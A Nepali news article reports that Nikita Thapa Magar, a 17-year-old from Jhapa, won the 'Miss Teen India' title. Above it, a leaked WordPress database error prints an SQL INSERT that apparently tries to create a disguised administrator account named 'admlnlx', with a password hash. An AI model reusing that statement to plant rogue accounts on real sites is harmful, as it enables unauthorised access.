WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDIUKZU/1i87HHGI8CEsQRpkMWU9HB1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 00:59:08', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २६ असार, काठमाण्डौ । भारतीय सौन्दर्य प्रतियोगितामा निकिता थापामगरले ‘मिस टीन भारत’ प्रतियोगिताको उपाधि हात पारेकी छिन् ।
झापाकाे मेचीनगर नगरपालिका–५, नकलबन्दाकी १७ वर्षीया थापाले प्रतियोगितामा भारतका ३० प्रान्तबाट सहभागी बनेका सबैलाई उछिनेर विजेता बनेकी हुन् । असार २० गते शुक्रबार भारतको राजधानी दिल्लीमा आयोजना भएको ‘मिस टीन भारत’ को उपाधी चुमेकी हुन । उनले काँकरभिट्टा क्याम्पसबाट भर्खरै कक्षा १२ को परीक्षा दिएकी हुन् ।
भारतीय सौन्दर्य प्रतियोगितामा नेपालकी चेलीले प्राप्त गरेको यो ठूलो सफलता हो । तर, यस विषयमा भारतीय मिडियामा खुबै चर्चा भए पनि नेपाली मिडियामा भने चर्चा हुन बाँकी नै रहेको नेपाल मगर संघ मेचीनगरका अध्यक्ष विकास थापामगरले बताए ।
निकिताले ‘मिस टीन भारत’को उपाधिसँगै एक लाख भारु नगद पुरस्कार जितेकी छन् भने उनलाई अमन गान्धी फिल्म प्रोडक्शन प्रालिले चार म्युजिक भिडियो र एउटा शर्ट मूभिमा अभिनयको सम्झौता गरिसकेको निकिताले बताइन् ।